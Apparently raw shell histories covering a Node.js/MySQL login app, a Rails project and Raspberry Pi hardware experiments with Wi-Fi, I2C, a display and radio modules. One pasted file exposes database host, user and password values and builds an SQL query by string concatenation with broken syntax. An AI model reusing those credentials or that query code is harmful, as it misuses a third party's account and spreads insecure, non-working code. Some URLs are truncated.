app +node app +TypeError: Cannot call method 'replace' of undefined +node app +node app +npm install +node app +node app +node app +node app +node app +node app +node app + throw new Error('Can\'t set headers after they are sent.'); +node app +node app +node app +node app +node app +node app +node app +npm install passport +node app +node app +npm install passport-local +node app +node app +node app +node app +node app +node app +ls -a +mode app +node app +ls +cat login html +cat login.html +ls +ls +node app +node register +ls -a +node register +ls +ls -a +cat form.html +ls +history +logout +ls -a +node app +LS +ls +node login +node app +ls -a +history +node app +logout +ls -a +node app +node login +ls +logout +ls + +logout +ls -a +ls +cat routes +ls +ls +cat login.js +stel.com/ +stances/250x250/26700843.jp +l +ls +ls +node app +node register +node login +logout +ls +node login +cat login.js +ls-a +ls -a +node login +node app +node register +node login +logout +ls +cat app.js +ls -a +node app.js +ls +ls +node app +ls +ls +node index +node user +node register +node login +ls +ls +jade index +jade layout.jade +ls +ls +jade home +ls +ls +node form.html +ls +node login +node app +logout +ls +ls +node app +ls -a +node login +node app +node app +logout +node app +node app.js +node login +node register +ls -a +ls +ls -a +node app +node list +node list +node app +node app +node app +node app +node app +node app +node all +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +ls +node app +node login +ls +ls +ls -a +node login +node register +node login.js +logout +logout +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +ls +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +logout +node app +node app +node app +node app +node app +node app +node app +Error: listen EADDRINUSE +Error: listen EADDRINUSE +ps | grep node +ps | grep node +node app +node app +cat app.js +ls +ls +ls +pwd +pwd +cat login.js +vi login.js +node app +node app +node app +node app +TypeError: Object darren has no method 'send' +node app +node app +node app +node app +cat login.js +exports.LoginUser = function (res, req) +{ var express = require('express'); + var http = require('http'); + var util = require('util'); + var path = require('path'); + var mysql = require('mysql'); + var fs = require('fs'); +var connection = mysql.createConnection( + { host : 'danu2.it.nuigalway.ie',; user : 'mydb1155',; password : 'mydb11555',; database : 'mydb1155',; } + ); +var queryString = 'SELECT username , password FROM USERS WHERE username = ' + ' "user.usernameForm" AND ' + ' password = ' + ' "user.passwordform" ' ; +connection.query(queryString, function(err, rows, fields) { + if (err) throw err; + console.log(rows[0]); + if (rows[0] = null ); { // res.send("try again"); + console.log('try again!'); + } + else + { console.log("User is logged in"); + console.log(queryString); + } + }); +cat login.js +node app +ls +ls -a +node app +ls -a +logout +logout +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +TypeError: Object # has no method 'redirect' +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app + j@mail.com : jim : duggan : test +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app_v1 +node app_v1 +node app_v1 +node app_v1 +ls +node app_vi_files +node app_v1 +node app_v1 +node app_v1.js +node app_v1.js +node app_v1.js +node app_v1.js +node app_v1.js +node app_v1.js +node app_v1.js +ls +node app_v1 +node app_v1.js +node app +ls +node app +logout +logout +node app +node app +node app +logout +logout +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +node app +/usr/lib/node_modules/mysql/lib/protocol/SqlString.js:33 + val = val.replace(/[\0 +\r\b\t\\\'\"\x1a]/g, function(s) { +/usr/lib/node_modules/mysql/lib/protocol/SqlString.js:33 +node app +node app +node app +node app +node app +node app.js +logout +ls +bundle install +rails server -b +exit +rails generate controller home index +rails generate model User Application +rails generate model Application +rake db:migrate +rails generate migration add_password_to_user +rake db:migrate VERSION=0 +rake db:migrate +rake db:seed +exit +bundle install +rake db:migrate RAILS_ENV=development +rake db:seed +rails s -b +bundle install +rails -v +rake routes +rails generate controller user new +rake routes +rails destroy controller user +rails g controller users index new create destroy +clear; rake routes +rake db:migrate VERSION=0 +rake db:setup +rake db:migrate +rake db:seed +gem install nokogiri -v '' +sudo apt-get install zlib1g-dev +bundle install +rake db:migrate +rake db:seed +exit +bundle install +rake db:migrate +rake db:seed +rake db:seed +rake db:seed +rake db:migrate RAILS_ENV=development +rake db:migrate VERSION=0 +rake db:seed +rails s -b +rails c +exit +ps -aux | grep rails +kill 29684 +kill 10460 +kill 920 +ps -aux | grep rails +rails s -b +gem install rubocop +sudo gem install rubocop +rubocop +rails s -b +rails s -b +rails s -b +exit +rubocop +rubocop +rubocop keys_controller.rb +clear +rubocop keys_controller.rb +rubocop keys_controller.rb +rubocop application_controller.rb +rubocop application_controller.rb +rubocop home_controller.rb +clear +clear +rubocop home_controller.rb +rubocop k +rubocop keys_controller.rb +rubocop sessions_controller.rb +rubocop sessions_controller.rb +rubocop keys_controller.rb +rubocop keys_controller.rb +rubocop keys_controller.rb +rubocop keys_controller.rb +rubocop keys_controller.rb +rubocop keys_controller.rb +rubocop keys_controller.rb +rubocop keys_controller.rb +rubocop sessions_controller.rb +rubocop users_controller.rb +clear +rubocop users_controller.rb +rubocop users_controller.rb +rubocop users_controller.rb +clear +rubocop +rubocop +rubocop +rubocop application_helper.rb +rubocop home_helper.rb +rubocop keys_helper.rb +rubocop keys_helper.rb +rubocop users_helper.rb +clear +rubocop sessions_helper.rb +rubocop sessions_helper.rb +rubocop sessions_helper.rb +rubocop sessions_helper.rb +rubocop controllers/keys_controller.rb +rubocop controllers/keys_controller.rb +rubocop controllers/keys_controller.rb +rubocop controllers/keys_controller.rb +rubocop ../controllers/keys_controller.rb +rubocop sessions_helper.rb +rubocop sessions_helper.rb +clear +rubocop +clear +rubocop +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop key.rb +rubocop user.rb +rubocop user.rb +rubocop user.rb +rubocop +rubocop config/routes.rb +rubocop config/routes.rb +rubocop config/routes.rb +exit +bundle install +rubocop +rake db:schema:load +rake db:seed +rails s -b +rails s -b +rails s -b +exit +#1525048066 +ls +#1525048068 +ls +#1525048074 +#1525048076 +ls +#1525048081 +sudo su +#1525048738 +cat /etc/shells +#1525048745 +zsh +#1525048790 +chsh -s /bin/zsh +#1525048821 +find / -name zsh +#1525056416 +ls +#1525058618 +uname -a +#1525058769 +yum -y install net-snmp* +#1525048836 +sudo su +#1525058778 +sudo su +#1525430478 +ls +#1525430497 +sudo su +#1525476032 +sudo su +ifconfig +raspi-config +sudo raspi-config +ifconfig +sudo vi /etc/network/interfaces +dc / +sudo cp interfaces interfaces.bak +sudo vi interfaces +sudo vi /etc/wpa_supplicant/wpa_supplicant.conf +ls +cp wpa_supplicant.conf wpa_supplicant.conf.bak +sudo cp wpa_supplicant.conf wpa_supplicant.conf.bak +vi wpa_supplicant.conf +sudo vi wpa_supplicant.conf +cat wpa_supplicant.conf +sudo cat wpa_supplicant.conf +ifconfig +ifconfig wlan0 down +sudo ifconfig wlan0 down +sudo ifconfig wlan0 up +ifconfig +lsusb +sudo reboot +ifconfig +ifconfig -a +ls -altr +ls +more ifupdown.sh +more action_wpa.sh +ls +vi functions.sh +sudo wpa_supplicant +ls +sudo vi wpa_supplicant.conf +sudo vi interfaces +sudo reboot +pwd +ifconfig +ls +sudo vi interfaces +reboot +sudo reboot +ifconfig +ping +ping +cat /proc/cpuinfo +ls -altr +ifconfig -a +ifconfig wlan0 +route -n +ls -altr +ls +vi interfaces +sudo vi interfaces +ls +cat interfaces.bak +ls +vi interfaces +sudo vi interfaces +sudo vi wpa_supplicant.conf +sudo reboot +ifconfig +ifconfig -a +ifconfig +ifconfig -a +ping +sudo ifup wlan0 +ls +ls +sudo vi wpa_supplicant.conf +sudo iwlist wlan0 scanning +sudo ifdown wlan0 +sudo /etc/interfaces +sudo vi /etc/network/interfaces +sudo ifdown wlan0 +sudo ifup wlan0 +ifconfig +ls +sudo wpa_supplicant +ls +sudo vi wpa_supplicant.conf +sudo vi /etc/network/interfaces +sudo reboot +ifconfig +lsusb +lsmod +ifconfig -a +cat /etc/network/interfaces +cat /etc/wpa_supplicant/wpa_supplicant.conf +sudo cat /etc/wpa_supplicant/wpa_supplicant.conf +sudo vi /etc/network/interfaces +sudo wpa_cli scan && sleep 5 && wpa_cli scan_results +wpa_cli +pwd +sudo wpa_cli +sudo ifdown wlan0 && sudo ifup wlan0 +sudo vi /etc/network/interfaces +sudo ifdown wlan0 && sudo ifup wlan0 +sudo wpa_cli scan +sudo reboot +sudo vi /etc/networks/interface +sudo vi /etc/networks/interfaces +sudo vi /etc/network/interfaces +sudo vi /etc/wpa_supplicant/wpa_supplicant.conf +sudo vi /etc/network/interfaces +sudo vi /etc/wpa_supplicant/wpa_supplicant.conf +ls /var/run +sudo ls -al /var/run +ls -altr +sudo reboot +exit +sudo cat /etc/network/interfaces +sudo cat /etc/wpa_supplicant/wpa_supplicant.conf +ls /etc/wpa_supplicant/wpa_supplicant.conf +cat /etc/wpa_supplicant/wpa_supplicant.conf +sudo ifdown wlan0 +sudo ifup wlan0 +sudo ifdown wlan0 +sudo ifup wlan0 +ifconfig +sudo ifdown wlan0 +sudo ifup wlan0 +ip addr +sudo ifdown wlan0 +sudo ifup wlan0 +iwconifg +iwconfig +sudo ifup wlan0 +iwconfig +sudo ifdown wlan0 +sudo ifup wlan0 +man ifup +sudo ifup -v wlan0 +sudo ifdown -v wlan0 +sudo ifup -v wlan0 +sudo /sbin/wpa_supplicant -P /var/run/wpa_supplicant.wlan0.pid -i wlan0 -D n180211,wext -c /etc/wpa_supplicant/wpa_supplicant.conf +ps -ef | grep wpa +kill 2756 +sudo kill 2756 +sudo /sbin/wpa_supplicant -P /var/run/wpa_supplicant.wlan0.pid -i wlan0 -D n180211,wext -c /etc/wpa_supplicant/wpa_supplicant.conf +sudo ifdown wlan0 +sudo ifup wlan0 +iwconfig +lsmod +tail /var/log/wpa_supplicant.log +ps -ef | grep wpa +sudo ifconfig wlan0 up +sudo iwlist wlan0 scanning +ls +sudo vi /etc/wpa_supplicant/wpa_supplicant.conf +sudo iwconfig wlan0 essid WLRR +sudo ifdown wlan0 +sudo ifup wlan0 +sudo vi /etc/network/interfaces +sudo ifup wlan0 +sudo ifdown wlan0 +sudo ifup wlan0 +iwconfig +sudo ifdown wlan0 +sudo ifup wlan0 +iwconfig +ls -altr +ls +sudo vi interfaces +sudo ifdown wlan0 +sudo ifup wlan0 +iwconfig +sudo vi interfaces +sudo ifdown wlan0 +sudo ifup wlan0 +sudo vi interfaces +sudo ifdown wlan0 +sudo ifup wlan0 +sudo /etc/wpa_supplicant/wp +sudo vi /etc/wpa_supplicant/wpa_supplicant.conf +sudo ifdown wlan0 +sudo ifup wlan0 +iwconfig +ifconfig +sudo shutdown -h 0 +ls -altr +piconfig +ls -altr +sudo vi /boot/cmdline.txt +s +ls +more issue +more issue.txt +ls -altr +more LICENSE.oracle +cp cmdline.txt cmdline.txt.bak +sudo cp cmdline.txt cmdline.txt.original +vi cmdline.txt +sudo vi cmdline.txt +cp inittab inittab.original +sudo cp inittab inittab.original +vi inittab +sudo vi inittab +sudo shutdown -r now +apt-get update +sudo apt-get update +apt-get install minicom +sudo aptget install minicom +sudo apt-get install minicom +minicom -b 115200 -o -D /dev/ttyAMA0 +minicom -b 19200 -d +minicom -b 19200 -o -D /dev/ttyAMA0 +ls -altr +sudo shutdown -h 0 +sudo apt-get install python-dateutil python-argparse +python +sudo apt-get install python-dateutil +python +apt-get install pyserial +sudo apt-get install pyserial +sudo pip install pyserial +which python +s +ls +sudo apt-get install python-pip +sudo apt-get install python-setuptools +sudo easy_install pip +pip install pyserial +sudo pip install pyserial +ls +mkdir serial +rm serial +rmdir serial +mkdir fernandito +python +ls /dev/tt* +python +vi sim900.py +python +cat sim900.py +python +vi sim900.py +python +vi +58 sim900.py +python +ls /dev +vi sim900.py +python +vi sim900.py +python +vi sim900.py +python +vi sim900.py +python +ls -altr +vi sim900.py +python +vi sim900.py +python +ls altr +ls -altr +vi sim900.py +python +vi sim900.py +minicom +minicom -? +minicom --help +minicom -b 19200 -o -D /dev/ttyAMA0 +sudo shutdown -h 0 +ls -altr +ls +python +minicom -.help +minicom --help +minicom -b 19200 -o -D /dev/ttyAMA0 +ls +vi sim900.py +ls +python +ls +python +fg +ps -ef +ps -ef | grep python +kill 2365 +bg +python +python sim900.py +python +ls -altr +git push +git status +sudo apt-get update +sudo apt-get install git +ls -altr +pwd +touch README.md +git init +git add README.md +git add fernandito +git commit -m "first commit" +git config --global user.email "robertomd@gmail.com" +git commit -m "first commit" +git config --global user.name "RobertoMD" +git commit -m "first commit" +git remote add origin +git push -u origin master +ls -altr +python +ls +git commit -m "next" +git push +git status +git push -u origin master +git push --all +git commit +git commit -a +git push +python +python +sudo shutdown -h 0 +vi sim900.py +git commit -m "a" +git commit +git push +git commit +git commit -a +git push +exit +ls -altr +ls -altr +python +sudo shutdown -h 0 +vi sim900.py +ls -altr +rm .sim900.py.swp +vi sim900.py +git commit -a +git push +man tvservice +tvservice +tvservice -s +tvservice --off +ls -altr +python +sudo shutdown -h 0 +ls +vi raspi-blacklist.conf +sudo vi raspi-blacklist.conf +cat raspi-blacklist.conf +sudo shudown -r now +sudo shutdown -r now +sudo i2cdetect -y 1 +vi /etc/modules +sudo apt-get install python-smbus +sudo i2cdetect -y 1 +sudo i2cdetect -y 0 +ls /dev +ls /dev/i2c +modprobe +sudo modprobe +sudo modprobe -h +sudo modprobe -c +sudo modprobe -c | grep i2c +sudo modprobe -h +sudo modprobe i2c-bcm2708 +i2cdetect -y 1 +sudo vi /etc/modules +sudo modprobe i2c-dev +sudo i2cdetect -y 1 +sudo shutdown -h 0 +ls +mkdir servo +vi servo.py +vi i2c.py +vi servo.py +python +sudo python +vi serv.py +vi servo.py +ls -altr +vi i2c.py +ls -altr +sudo python +vi servo.py +ls +sudo python +def setServoPulse(channel, pulse): +git clonespberry-Pi-Python-Code.git +ls +dir +ls +ls +ls -altr +sudo python Servo_Example.py +vi Servo_Example.py +sudo python Servo_Example.py +vi Servo_Example.py +ls +vi Adafruit_PWM_Servo_Driver.py +vi Servo_Example.py +sudo python Servo_Example.py +more Servo_Example.py +sudo python +sudo shutdown -h 0 +ls +vi servo.py +ls +ls +ls +ls +ls +notepad servo.py +sudo python +sudo shutdown -h 0 +ls +mkdir stepper +vi stepper.py +sudo stepper.py +ls +vi stepper.py +which python +vi stepper.py +chmod 755 stepper.py +sudo ./stepper.py +vi stepper.py +cat stepper.py +sudo python +vi stepper.py +more ../servo/servo.py +vi stepper.py +more ../servo/servo.py +vi stepper.py +sudo python +vi +26 stepper.py +sudo python +vi +13 stepper.py +vi ../servo/servo.py +vi +13 stepper.py +sudo python +vi stepper.py +python +vi stepper.py +sudo python +vi stepper.py +sudo python +vi stepper.py +sudo python +vi stepper.py +sudo python +vi stepper.py +sudo python +vi stepper.py +sudo python +vi stepper.py +sudo python +vi stepper.py +sudo python +vi stepper.py +sudo python +vi stepper.py +sudo python +ls -altr +vi stepper.py +sudo python +vi stepper.py +sudo python +vi stepper.py +sudo python +vi stepper.py +sudo shutdown -h 0 +i2cdetect +i2cdetect -y 0 +sudo i2cdetect -y 0 +sudo vi /etc/modules +sudo i2cdetect -y 0 +sudo shutdown -r 0 +sudo i2cdetect -y 0 +sudo i2cdetect -y 1 +pwd +ls +mkdir display +git clone +ls -alr +ls -altr +ls +sudo make +ls +ls +ls altr +ls -altr +sudo make +ls -altr +ls +ssd1306_demo +ls +ls +vi Makefile +ls +sudo make +sudo apt-get install lm-sensors +make clean +sudo make clean +sudo make +sudo make clean +sudo make +sudo make +more /etc/ +ls -altr +ls +sudo i2cdetect -y 1 +sudo i2cdetect -y 0 +sudo i2cdetect -y 1 +ls +ls +ls +ls -altr +ls +vi SSD1306.py +cat __init__.py +vi SSD1306.py +ls +sudo python +ls +find . -print | grep -i GPIO +ls +ls +ls +ls +ls -altr +ls -al +ls -altr +chown -R pi:pi Adafruit_Python_SSD1306/ +sudo chown -R pi:pi Adafruit_Python_SSD1306/ +ls -al +ls +mv Adafruit_SSD1306/ SSD1306 +ls +vi I2C.py +vi SSD1306.py +ls +vi GPIO.py +ls +vi GPIO.py +vi SSD1306.py +sudo python +ls +ls +vi animate.py +mv Adafruit_Python_SSD1306/ SSD1306 +ls -altr +ls +ls -altr +rm README.md +rm LICENSE +rm ez_setup.py +rm setup.py +ls -altr +cp examples/animate.py SSD1306/ +ls +cat animate.py +vi animate.py +ls +sudo python +ls -altr +vi SSD1306.py +ls +sudo python +sudo pip install pil +sudo pip uninstall pil +python -V +apt-cache search | grep PIL +apt-cache search pil +apt-cache search +apt-cache search python | grep pil +sudo apt-get install python-imaging +sudo apt-get update +sudo apt-get install python-imaging +sudo python +ls -altr +vi test.py +ls /usr/share/fonts/truetype/ +ls /usr/share/fonts/truetype/freefont/ +ls +vi test.py +sudo python test.py +vi test.py +sudo python test.py +vi test.py +sudo test.py +sudo python test.py +vi test.py +python +ls +vi test.py +sudo python test.py +python +vi test.py +sudo python test.py +vi test.py +sudo python test.py +vi test.py +sudo python test.py +vi test.py +sudo python test.py +vi test.py +sudo python test.py +vi test.py +sudo python test.py +vi test.py +sudo python test.py +vi test.py +pushd /usr/share/fonts/ +ls -altr +ls truetype +ls +ls -al +ls -al +popd +vi test.py +sudo python test.py +vi test.py +git commit -a +git commit +git add +git add . +git commit -m +git commit -a +git commit -a +git add display +git commit -a +git push +ls -altr +ls +ls +ls +ls -altr +vi test.py +sudo python test.py +vi test.py +sudo python test.py +cp test.py test2.py +vi test2.py +ls +vi SSD1306.py +vi test2.py +sudo python test2.py +vi test2.py +sudo python test2.py +vi test2.py +sudo python test2.py +vi test2.py +sudo python test2.py +vi test.py +vi test2.py +sudo python test2.py +vi test.py +vi test2.py +sudo python test2.py +vi test2.py +sudo pytho test2.py +sudo python test2.py +vi test2.py +sudo python test2.py +vi test2.py +sudo python test2.py +vi test2.py +sudo python test2.py +vi SSD1306.py +vi test2.py +sudo test2.py +sudo python test2.py +vi test2.py +sudo python test2.py +python +vi test2.py +python +sudo python test2.py +vi test2.py +vi test3.py +cp test.py test3.py +vi test3.py +python +vi test3.py +sudo python test3.py +vi test3.py +sudo python test3.py +vi test3.py +sudo python test3.py +vi test3.py +sudo python test3.py +vi test3.py +git commit -a +git add display/SSD1306 +git commit -a +git push +git commit +git commit -a +git commit -a +git push +ls -altr +sudo shutdown -h 0 +ls -altr +ls +ls +ls -al +rm -R .git .gitignore +rm -Rf .git +ls -altr +rm .gitignore +ls +sudo python test3.py +cp test3.py test4.py +vi test4.py +sudo python test4.py +vi test4.py +vi test2.py +vi test4.py +sudo python test4.py +vi test4.py +sudo python test4.py +vi test4.py +sudo python test3.py +vi test4.py +sudo python test4.py +vi test4.py +sudo python test4.py +vi test.py +vi test4.py +sudo python test4.py +ls -latr +sudo python test.py +sudo python test2.py +sudo python test3.py +vi test4.py +sudo python test4.py +vi test3.py +vi test2.py +vi test4.py +sudo python test4.py +python +ls -altr +vi test4.py +sudo python test3.py +vi test4.py +sudo python test4.py +vi test4.py +sudo python test4.py +vi test4.py +sudo python test4.py +vi test3.py +vi test2.py +sudo python test2.py +vi test2.py +sudo python test2.py +vi test2.py +sudo python test2.py +ls +vi SSD1306.py +cp test2.py test5.py +vi test5.py +vi SSD1306.py +vi test5.py +sudo python test5.py +vi SSD1306.py +vi test5.py +sudo python test5.py +vi test5.py +sudo python test5.py +vi test5.py +sudo python test5.py +vi test5.py +sudo python test5.py +vi test5.py +vi SSD1306.py +cp test5.py test6.py +sudo python test.py +sudo python test2.py +vi test6.py +sudo python test6.py +vi test6.py +vi SSD1306.py +vi test6.py +sudo python test6.py +vi test6.py +vi SSD1306.py +sudo python test6.py +vi test6.py +sudo python test6.py +vi SSD1306.py +vi test5.py +sudo python test5.py +vi test5.py +sudo python test5.py +vi test5.py +sudo python test5.py +vi SSD1306.py +sudo python test5.py +vi test5.py +sudo python test5.py +vi SSD1306.py +vi test5.py +sudo python test5.py +vi test5.py +sudo python test5.py +vi SSD1306.py +vi test6.py +cp test6.py test6.py +cp test6.py test7.py +vi test7.py +sudo python test7.py +vi test7.py +sudo python test7.py +vi test7.py +vi SSD1306.py +cp test7.py test8.py +vi test8.py +sudo python test8.py +print "scroll speed "i +python +vi test8.py +sudo python test8.py +vi test8.py +sudo python test8.py +vi test8.py +sudo python test8.py +sudo python test7.py +sudo python test6.py +sudo python test5.py +ls -altr +cp test2.py reset.py +vi reset.py +sudo python reset.py +vi SSD1306.py +ls +ls -altr +git commit -a +git commit -a +ls +ls +git commit -a +git add . +git commit -a +git add SSD1306/ +git commit -a +ls -al +git push +git commit -a SSD1306/ +ls +ls +ls -altr +git commit -a +git add * +ls +git add * +git add SSD1306 +ls +git add SSD1306 +git commit -a +ls -altr +git commit -a +ls -altr +ls -altr +more index +ls -altr +git add display +git commit -a +git add display/SSD1306 +git commit -a +git commit -m +git add help +git add +git add . +git commit -a +ls -al +git add display +git commit -a +git checkin +git --help +git status +git reset +git add . +git commit -a +git diff +git help +git init +git commit -a +git add . +git commit -a +git commit +git init +ls -altr +git add . +ls -altr +touch README.md +git init +git add README.md +git add fernandito +git add servo +git add display +git commit -m "first commit" +git remote add origin +git push -u origin master +git status +sudo shutdown -r 0 +sudo shutdown -h 0 +ls +ls +vi t.py +vi test31.py +vi test3.py +vi test31.py +ls -altr +rm -Rf ArduiPi_SSD1306/ +ls +ls +ls +vi SSD1306.py +sudo python +vi test2.py +cp SSD1306.py SSD1306_orig.py +vi SSD1306.py +vi test2.py +vi SSD1306.py +vi test2.py +sudo python test2.py +sudo python reset.py +vi test3.py +python +sudo python test3.py +sudo python reset.py +vi test3.py +cp test3.py test31.py +vi test31.py +cat test31.py +sudo python +vi t.py +sudo python +vi t.py +python +notepad t.py +vi t.py +python +vi t.py +python +vi t.py +python +vi test3.py +vi t.py +python +vi t.py +python +python t.py +python +import Image +import ImageFont +import ImageDraw +import time +w=128 +h=64 +image=Image.new('1',(w,h)) +font=ImageFont.truetype('/usr/share/fonts/truetype/droid/DroidSans.ttf',10) +draw=ImageDraw.Draw(image) +text='En mi puerta plante un pino Pensando que me querias Y ahora que ya no me quieres No puedo sacar el carro' +from t import wrappedtext +lines=wrappedtext(text,font,image) +python +sudo python test31.py +sudo shutdown -h 0 +ls -altr +ls +ls +ls +sudo python test.py +sudo python test8.py +sudo python reset.py +sudo python test6.py +sudo python test5.py +sudo python test4.py +sudo python reset.py +sudo python test31.py +sudo shutdown -h now +i2cdetect +i2cdetect -y 0 +sudo i2cdetect -y 1 +sudo i2cdetect -y 0 +dir +ls +mkdir nrf24l01 +dir +find . -name I2C.py +ls +ls -altr +cp I2C.py ../../../nrf24l01/ +cp GPIO.py ../../../nrf24l01/ +cp DDS1306.py ../../../nrf24l01/ +cp SSD1306.py ../../../nrf24l01/ +ls +vi I2C.py +vi GPIO.py +ls +vi I2C.py +ls +vi SSD1306.py +sudo python +ls +more I2C.py +sudo shutdown -h 0 +ls +ls +ls .atr +ls -altr +ls +ls -altr +ls -altr +more I2C.py +sudo python +ls +vi I2C.py +d.write8(0x23,1) +sudo python +sudo shutdown -h 0 +ls +ls +sudo python +ls -altr +vi I2C.py +find / -name smbus.py +sudo find / -name smbus.py +sudo find / -name smbus.pyc +sudo find / -name smbus.* +man smbus +ls +ls -altr +more smbus-1.1.egg-info +ld -d smbus.so +nm smbus.so +ls -altr +more smbus-1.1.egg-info +i2cset +i2cset -y 1 0x23 23 +sudo i2cset -y 1 0x23 23 +ls /dev +sudo python +more /usr/include/linux/i2c-dev.h +sudo python +sudo python +vi send10.py +sudo python send10.pyp +sudo python send10.py +vi send10.py +sudo python send10.py +ls +cat send10.py +vi send10.py +sudo python send10.py +vi send10.py +sudo python send10.py +vi send10.py +mv send10.py send.py +sudo python send +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +more send.py +vi send.py +git commit -a +git push +ls +git commit -a +git commit -a +git add nrf24l01 +git commit -a +git push +sudo shutdown -h 0 +ls -altr +sudo python +sudo i2cdetect -y 1 +ls -altr +ls +vi i2c.py +ls +vi servo.py +sudo i2cdetect -y 1 +sudo python +sl +ls +mkdir adda +cp nrf24l01/I2C.py adda +sudo python +ls +ls +ls +sudo shutdow -h 0 +sudo shutdown -h 0 +ls -altr +vi Wireless.py +cat I2C.py +ls +cp I2C.py Wireless.py +vi Wireless.py +ls +more send.py +vi Wireless.py +ls +cat send.py +vi Wireless.py +ls +ls +cat send.py +sudo python +sudo i2cdetect -y 1 +sudo python +sudo modprobe -r i2c_bcm2708 +sudo python +i2cget +i2cset -y 1 0x23 0x10 +sudo i2cset -y 1 0x23 0x10 +sudo i2cget -y 1 0x23 +i2cdump 1 0x23 +sudo i2cdump 1 0x23 +sudo dmesg +sudo i2cinit +sudo i2cdump 1 0x23 +sudo i2cget -y 1 0x23 0 +sudo i2cget -y 1 +sudo i2cget -y 1 0x23 b +sudo i2cget -y 1 0x23 +sudo i2cset -y 1 0x23 0x11 +sudo i2cget -y 1 0x23 +sudo i2cget -y 1 0x23 0x11 +sudo shutdown -r 0 +sudo i2cset 1 0x23 0x11 +sudo i2cget 1 0x23 +sudo i2cdump +sudo i2cdump -y 1 0x23 b +i2cset -y 1 0x23 0x10 +sudo i2cset -y 1 0x23 0x10 +i2cget -y 1 0x23 +sudo i2cget -y 1 0x23 +sudo dmesg +sudo i2cget -y 1 0x23 +sudo i2cset -y 1 0x23 0x10 +sudo i2cget -y 1 0x23 +sudo i2cset -y 1 0x23 0x10 +sudo i2cget -y 1 0x23 +sudo i2cset -y 1 0x23 0x10 +sudo i2cget -y 1 0x23 +sudo shutdown -h 0 +sudo i2cset -y 1 0x23 0x10 +sudo i2cget -y 1 0x23 +wgets.co.uk/download/rpi_i2c.zip +dir +mv rpi_i2c.zip nrf24l01/ +ls +unzip rpi_i2c.zip +sudo ./i2c_slow +ls -altr +chmod 755 i2c_slow +chmod 755 i2c_fast +sudo ./i2c_slow +i2cset -y 1 0x23 0x10 +sudo i2cset -y 1 0x23 0x10 +sudo i2cget -y 1 0x23 +sudo ./i2c_fast +sudo i2cset -y 1 0x23 0x10 +sudo i2cget -y 1 0x23 +sudo i2cset -y 1 0x23 0x10 +sudo i2cdetect -y 1 +sudo i2cget -y 1 0x23 +sudo i2cset -y 1 0x23 0x10 +sudo i2cdetect -y 1 +sudo i2cget -y 1 0x23 +sudo i2cset -y 1 0x23 0x10 +sudo i2cget -y 1 0x23 +sudo shutdown -h 0 +ls -altr +ls +ls -a.tr +ls -altr +mv nrf24l01/ nrf24l01.i2c +mkdir nrf24l01 +sudo vi /etc/modprobe.d/raspi-blacklist.conf +ls /dev +git clone +ls -altr +ls -altr +more README.md +ls -altr +more README.md +ls -altr +vi RF24.h +ls +ls -altr +more FAQ +ls- latr +ls -altr +vi RF24.cpp +sudo shutdown -h 0 +ls -altr +ls +rm -R rtemp +ls +git clone +ls -altr +ls +rm -Rf RF24 +git clone +ls +ls +more nrf24.py +ls +more README.md +ls +ls +ls -altr +more README.md +ls +ls +more send.py +sudo python +ls +sudo pyhton +sudo python +ls +ls +ls display +ls display/SSD1306/ +ls display/SSD1306/SSD1306/ +cp display/SSD1306/SSD1306/GPIO.py nrf24l01/pynrf24/ +ls +vi nrf24.py +sudo python +ls +cat examples/send.py +sudo python +sudo lsmod +ls -al +ls +mkdir python-spi +mkdir python-spi +rd python-spi/ +rmdir python-spi/ +ls +wgetspidev/master/setup.py +wgetspidev/master/spidev_module.c +ls -al +more setup.py +ls +more spidev_module.c +sudo python setup.py install +vi spidev_module.c +ls +more setup.py +find /usr/include +find /usr/include -name Python.h +sudo python setup.py install +sudo apt-get install python-dev +sudo apt-get update +sudo apt-get install python-dev +ls +sudo python setup +ls +sudo python setup.py +sudo python setup.py install +sudo python +ls +cat examples/send.py +sudo python +ls +vi nrf24.py +ls +vi nrf24.py +sudo python +grep P9_15 * +vi nrf24.py +ls +more GPIO.py +ls +vi GPIO.py +cat examples/send.py +sudo python +ls +vi nrf24.py +grep "The channel sent is invalid on a Raspberry Pi" * +vi +373 nrf24.py +sudo python +cat examples/send.py +sudo python +copy examples/send.py . +cp examples/send.py . +vi send.py +cat send.py +sudo python +vi send.py +cat send.py +sudo python send.py +vi send.py +ls -al /dev/ +ls +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +ls -altr +cat send.py +sudo python +ls -al /dev +ls- +cat send.py +sudo python +ls -al /dev/spi*.* +man -k node +man -k major +man major +man stat +stat /dev/spidev0.0 +man stat +stat /dev/spidev0.0 +sudo stat /dev/spidev0.0 +sudo stat /dev/spidev0.1 +man major +man stat +sudo stat --file-system /dev/spidev0.1 +ls -altr +vi send.py +cat send.py +sudo python +ls -altr +notepad send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py +sudo python send.py +vi send.py 